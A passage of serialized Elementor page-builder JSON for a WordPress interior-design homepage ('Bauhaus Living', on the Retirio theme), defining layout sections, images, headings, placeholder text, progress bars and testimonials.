1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"015c584\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"200\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"180\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"animation\":\"fadeInUp\",\"animation_tablet\":\"none\",\"animation_delay\":200},\"elements\":[{\"id\":\"f11899a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"content_position\":\"top\",\"align\":\"center\"},\"elements\":[{\"id\":\"b5b032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Trust the experts for all your <strong style=\\\"color: #242424;\\\">architects &amp; interior needs.<\\/strong><\\/p>\",\"text_color\":\"#9C9C9C\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_font_weight\":\"600\",\"_padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"60\",\"bottom\":\"15\",\"left\":\"40\",\"isLinked\":false},\"_element_width\":\"auto\",\"_background_background\":\"classic\",\"_background_color\":\"#F5F5F5\",\"align_mobile\":\"center\",\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":false},\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6c98d6d\",\"elType\":\"widget\",\"settings\":{\"text\":\"More Service\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"40\",\"bottom\":\"25\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/services\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor 